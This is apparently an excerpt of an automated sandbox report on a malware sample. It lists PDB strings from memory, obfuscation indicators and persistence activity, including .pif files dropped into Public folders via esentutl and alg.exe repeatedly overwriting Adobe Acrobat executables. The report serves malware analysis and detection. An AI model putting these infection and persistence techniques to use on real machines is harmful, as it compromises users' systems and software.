Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: alg.exe, 00000011.00000003.2074539308.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: alg.exe, 00000011.00000003.2074539308.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ADelRCP_Exec.pdb source: alg.exe, 00000011.00000003.2091776110.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: PresentationFontCache.pdb source: Native_neworigin.exe, 0000000D.00000003.1572667658.0000000006450000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000011.00000003.1689208067.0000000001620000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: mavinject32.pdbGCTL source: alg.exe, 00000011.00000003.2359192266.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000011.00000003.2355715441.00000000014A0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: _.pdb source: Native_neworigin.exe, 0000000D.00000002.1760923102.0000000005120000.00000004.08000000.00040000.00000000.sdmp, Native_neworigin.exe, 0000000D.00000003.1468315609.00000000007E2000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000000D.00000003.1460268947.000000000078D000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000000D.00000002.1712231989.0000000002B26000.00000004.00000020.00020000.00000000.sdmp, Native_neworigin.exe, 0000000D.00000002.1746628471.0000000003EE5000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: crashreporter.pdb source: alg.exe, 00000011.00000003.2498331114.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: plugin-container.pdb source: alg.exe, 00000011.00000003.2595573568.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: alg.exe, 00000011.00000003.2052085164.0000000001590000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_userers\MSRMSPIuserer.pdbAAAGCTL source: alg.exe, 00000011.00000003.2248881965.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: alg.exe, 00000011.00000003.2339872200.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: alg.exe, 00000011.00000003.2270845377.0000000000400000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000011.00000003.2261519561.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: cmd.pdb source: alpha.pif, alpha.pif, 0000000F.00000000.1455003658.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp
Source: Binary string: easinvoker.pdbGCTL source: C6dAUcOA6M.exe, 00000000.00000002.1458982491.0000000002AB2000.00000004.00000020.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1301019881.000000007F920000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1504921162.0000000020A24000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1504921162.0000000020A60000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1426009881.0000000021B0E000.00000004.00000020.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1300720331.0000000002AB4000.00000004.00000020.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1426009881.0000000021ADF000.00000004.00000020.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1300507084.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1453650948.0000000002356000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ping.pdb source: esentutl.exe, 00000006.00000003.1425402783.00000000058E0000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, 00000010.00000000.1457347897.0000000000391000.00000020.00000001.01000000.0000000E.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: alg.exe, 00000011.00000003.2121728301.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Acrobat_SL.pdb((( source: alg.exe, 00000011.00000003.1923600729.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: pingsender.pdb source: alg.exe, 00000011.00000003.2573538319.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: Native_neworigin.exe, 0000000D.00000003.1518786727.0000000006460000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ADelRCP_Exec.pdbCC9 source: alg.exe, 00000011.00000003.2091776110.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\Acrouserer.pdb source: alg.exe, 00000011.00000003.1939699992.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: easinvoker.pdb source: C6dAUcOA6M.exe, C6dAUcOA6M.exe, 00000000.00000003.1301019881.000000007F920000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1504921162.0000000020A24000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1504921162.0000000020A60000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1300507084.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1453650948.0000000002356000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: Acrobat_SL.pdb source: alg.exe, 00000011.00000003.1923600729.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: private_browsing.pdb source: alg.exe, 00000011.00000003.2605210191.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: cmd.pdbUGP source: esentutl.exe, 00000005.00000003.1420748141.0000000004CA0000.00000004.00001000.00020000.00000000.sdmp, alpha.pif, 00000007.00000002.1432672936.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000000A.00000000.1440012872.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000000F.00000000.1455003658.0000000000EE1000.00000020.00000001.01000000.00000006.sdmp
Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: alg.exe, 00000011.00000003.2308042218.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000011.00000003.2318454628.0000000000400000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000011.00000003.2306735952.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ping.pdbGCTL source: esentutl.exe, 00000006.00000003.1425402783.00000000058E0000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, 00000010.00000000.1457347897.0000000000391000.00000020.00000001.01000000.0000000E.sdmp
Source: Binary string: easinvoker.pdbH source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: alg.exe, 00000011.00000003.2052085164.0000000001590000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdbGG source: alg.exe, 00000011.00000003.2154657280.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb))) source: alg.exe, 00000011.00000003.1910966205.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: mavinject32.pdb source: alg.exe, 00000011.00000003.2359192266.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000011.00000003.2355715441.00000000014A0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 64BitMAPIBroker.pdb source: alg.exe, 00000011.00000003.2230247874.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: maintenanceservice.pdb source: alg.exe, 00000011.00000003.2547820503.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: alg.exe, 00000011.00000003.2339872200.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: firefox.pdb source: alg.exe, 00000011.00000003.2537784876.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: alg.exe, 00000011.00000003.2208687784.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: alg.exe, 00000011.00000003.2121728301.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: firefox.pdbP source: alg.exe, 00000011.00000003.2537784876.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DBC0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1403402887.000000007DCE6000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000003.1404685323.000000007EDD0000.00000004.00001000.00020000.00000000.sdmp, C6dAUcOA6M.exe, 00000000.00000002.1566459719.000000007EF46000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb@@ source: alg.exe, 00000011.00000003.2215515431.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdb source: alg.exe, 00000011.00000003.2154657280.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: alg.exe, 00000011.00000003.2254909034.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: private_browsing.pdbp source: alg.exe, 00000011.00000003.2605210191.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdb source: alg.exe, 00000011.00000003.2248881965.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: maintenanceservice.pdb` source: alg.exe, 00000011.00000003.2547820503.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: alg.exe, 00000011.00000003.2270845377.0000000000400000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000011.00000003.2261519561.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: alg.exe, 00000011.00000003.2162287109.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ALG.pdb source: Native_neworigin.exe, 0000000D.00000003.1459848467.0000000005100000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: Native_neworigin.exe, 0000000D.00000003.1518786727.0000000006460000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\Aut2Exe\Aut2Exe_x64.pdb source: alg.exe, 00000011.00000003.2708273963.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ALG.pdbGCTL source: Native_neworigin.exe, 0000000D.00000003.1459848467.0000000005100000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: Native_neworigin.exe, 0000000D.00000003.1572667658.0000000006450000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000011.00000003.1689208067.0000000001620000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdbTTT source: alg.exe, 00000011.00000003.1939699992.00000000015A0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: updater.pdb source: alg.exe, 00000011.00000003.2628176522.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: AppVShNotify.pdb source: alg.exe, 00000011.00000003.2335314280.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: alg.exe, 00000011.00000003.2215515431.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: alg.exe, 00000011.00000003.2162287109.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: AppVShNotify.pdbGCTL source: alg.exe, 00000011.00000003.2335314280.0000000000BB0000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation

Source: Yara match File source: 0.2.C6dAUcOA6M.exe.2cf0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.1301019881.000000007F920000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1300507084.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: 13.2.Native_neworigin.exe.59e0000.8.raw.unpack, WP6RZJql8gZrNhVA9v.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 13.2.Native_neworigin.exe.3f3c190.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 13.3.Native_neworigin.exe.78d220.17.raw.unpack, WP6RZJql8gZrNhVA9v.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 13.2.Native_neworigin.exe.3ee6478.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: aymtmquJ.pif.0.dr Static PE information: 0x9E9038DB [Sun Apr 19 22:51:07 2054 UTC]
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02D0894C LoadLibraryW,GetProcAddress,FreeLibrary, 0_2_02D0894C
Source: C6dAUcOA6M.exe Static PE information: real checksum: 0x0 should be: 0x138d20
Source: armsvc.exe.11.dr Static PE information: real checksum: 0x32318 should be: 0x13fe9a
Source: Juqmtmya.PIF.8.dr Static PE information: real checksum: 0x0 should be: 0x138d20
Source: Trading_AIBot.exe.11.dr Static PE information: real checksum: 0x0 should be: 0x16b30
Source: elevation_service.exe0.13.dr Static PE information: real checksum: 0x1bb29d should be: 0x24d76e
Source: aymtmquJ.pif.0.dr Static PE information: real checksum: 0x0 should be: 0x1768a
Source: alpha.pif.5.dr Static PE information: section name: .didat
Source: armsvc.exe.11.dr Static PE information: section name: .didat
Source: alg.exe.13.dr Static PE information: section name: .didat
Source: FXSSVC.exe.13.dr Static PE information: section name: .didat
Source: elevation_service.exe.13.dr Static PE information: section name: .00cfg
Source: elevation_service.exe.13.dr Static PE information: section name: .gxfg
Source: elevation_service.exe.13.dr Static PE information: section name: .retplne
Source: elevation_service.exe.13.dr Static PE information: section name: _RDATA
Source: elevation_service.exe.13.dr Static PE information: section name: malloc_h
Source: elevation_service.exe0.13.dr Static PE information: section name: .00cfg
Source: elevation_service.exe0.13.dr Static PE information: section name: .gxfg
Source: elevation_service.exe0.13.dr Static PE information: section name: .retplne
Source: elevation_service.exe0.13.dr Static PE information: section name: _RDATA
Source: elevation_service.exe0.13.dr Static PE information: section name: malloc_h
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02D1D2FC push 02D1D367h; ret 0_2_02D1D35F
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02CF63AE push 02CF640Bh; ret 0_2_02CF6403
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02CF63B0 push 02CF640Bh; ret 0_2_02CF6403
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02CFC349 push 8B02CFC1h; ret 0_2_02CFC34E
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02D1C378 push 02D1C56Eh; ret 0_2_02D1C566
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02CF332C push eax; ret 0_2_02CF3368
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02D1D0AC push 02D1D125h; ret 0_2_02D1D11D
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02D0306B push 02D030B9h; ret 0_2_02D030B1
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02D0306C push 02D030B9h; ret 0_2_02D030B1
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02D1D1F8 push 02D1D288h; ret 0_2_02D1D280
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02D1D144 push 02D1D1ECh; ret 0_2_02D1D1E4
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02D03107 push 02D030B9h; ret 0_2_02D030B1
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02D0F108 push ecx; mov dword ptr [esp], edx 0_2_02D0F10D
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02CF6784 push 02CF67C6h; ret 0_2_02CF67BE
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02CF6782 push 02CF67C6h; ret 0_2_02CF67BE
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02CF9748 pushfd ; iretd 0_2_02CF9757
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02CF9758 pushfd ; iretd 0_2_02CF975F
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02CF9760 pushfd ; iretd 0_2_02CF9763
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02CFD5A0 push 02CFD5CCh; ret 0_2_02CFD5C4
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02D1C570 push 02D1C56Eh; ret 0_2_02D1C566
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02CFC56C push ecx; mov dword ptr [esp], edx 0_2_02CFC571
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02D08AD8 push 02D08B10h; ret 0_2_02D08B08
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02D0AAE0 push 02D0AB18h; ret 0_2_02D0AB10
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02CFCA4E push 02CFCD72h; ret 0_2_02CFCD6A
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02CFCBEC push 02CFCD72h; ret 0_2_02CFCD6A
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02D64850 push eax; ret 0_2_02D64920
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02D0886C push 02D088AEh; ret 0_2_02D088A6
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02D06946 push 02D069F3h; ret 0_2_02D069EB
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02D06948 push 02D069F3h; ret 0_2_02D069EB
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02D0790C push 02D07989h; ret 0_2_02D07981
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02D05E7C push ecx; mov dword ptr [esp], edx 0_2_02D05E7E
Source: AppVClient.exe.13.dr Static PE information: section name: .reloc entropy: 7.936521710837491
Source: FXSSVC.exe.13.dr Static PE information: section name: .reloc entropy: 7.9422741099942105
Source: elevation_service.exe.13.dr Static PE information: section name: .reloc entropy: 7.943951723334859
Source: elevation_service.exe0.13.dr Static PE information: section name: .reloc entropy: 7.945960471485194
Source: 13.2.Native_neworigin.exe.59e0000.8.raw.unpack, WP6RZJql8gZrNhVA9v.cs High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'IFWZPInEOmhB5', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 13.2.Native_neworigin.exe.3f3c190.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'IFWZPInEOmhB5', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 13.3.Native_neworigin.exe.78d220.17.raw.unpack, WP6RZJql8gZrNhVA9v.cs High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'IFWZPInEOmhB5', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'
Source: 13.2.Native_neworigin.exe.3ee6478.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs High entropy of concatenated method names: 'G9skPDgcXb', 'KDikMXewCI', 'B2XkaLi4dH', 'hx5kqNgSj4', 'TVtkAMaqpL', 'VDqkQKyKML', 'IFWZPInEOmhB5', 'ab9oDe4UH3', 'TAOohhiP7R', 'zDKosecjaB'

Persistence and Installation Behavior

Source: C:\Windows\System32\alg.exe File created: C:\Windows\system32\config\systemprofile\AppData\Roaming\605af54964cdb3b4.bin
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\alpha.pif
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe File created: C:\Users\Public\Libraries\aymtmquJ.pif
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\xpha.pif
Source: C:\Windows\SysWOW64\esentutl.exe File created: C:\Users\Public\Libraries\Juqmtmya.PIF
Source: C:\Users\Public\Libraries\aymtmquJ.pif File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe (13 identical write events logged)
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe (8 identical write events logged)
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe (8 identical write events logged)
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe (8 identical write events logged)
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe (8 identical write events logged)
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe (8 identical write events logged)
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe (8 identical write events logged)
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe (8 identical write events logged)
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe (8 identical write events logged)
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe (8 identical write events logged)
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe (8 identical write events logged)
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe (8 identical write events logged)
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe (8 identical write events logged)
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe (8 identical write events logged)
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe (8 identical write events logged)
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe (8 identical write events logged)
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe (8 identical write events logged)
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe (8 identical write events logged)
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe (8 identical write events logged)
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\32BitMAPIuserer.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\32BitMAPIuserer.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\32BitMAPIuserer.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\32BitMAPIuserer.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\32BitMAPIuserer.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\32BitMAPIuserer.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\32BitMAPIuserer.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\32BitMAPIuserer.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\64BitMAPIuserer.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\64BitMAPIuserer.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\64BitMAPIuserer.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\64BitMAPIuserer.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\64BitMAPIuserer.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\64BitMAPIuserer.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\64BitMAPIuserer.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\64BitMAPIuserer.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\MSRMSPIuserer.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\MSRMSPIuserer.exe
Source: C:\Windows\System32\alg.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_userers\MSRMSPIuserer.exe
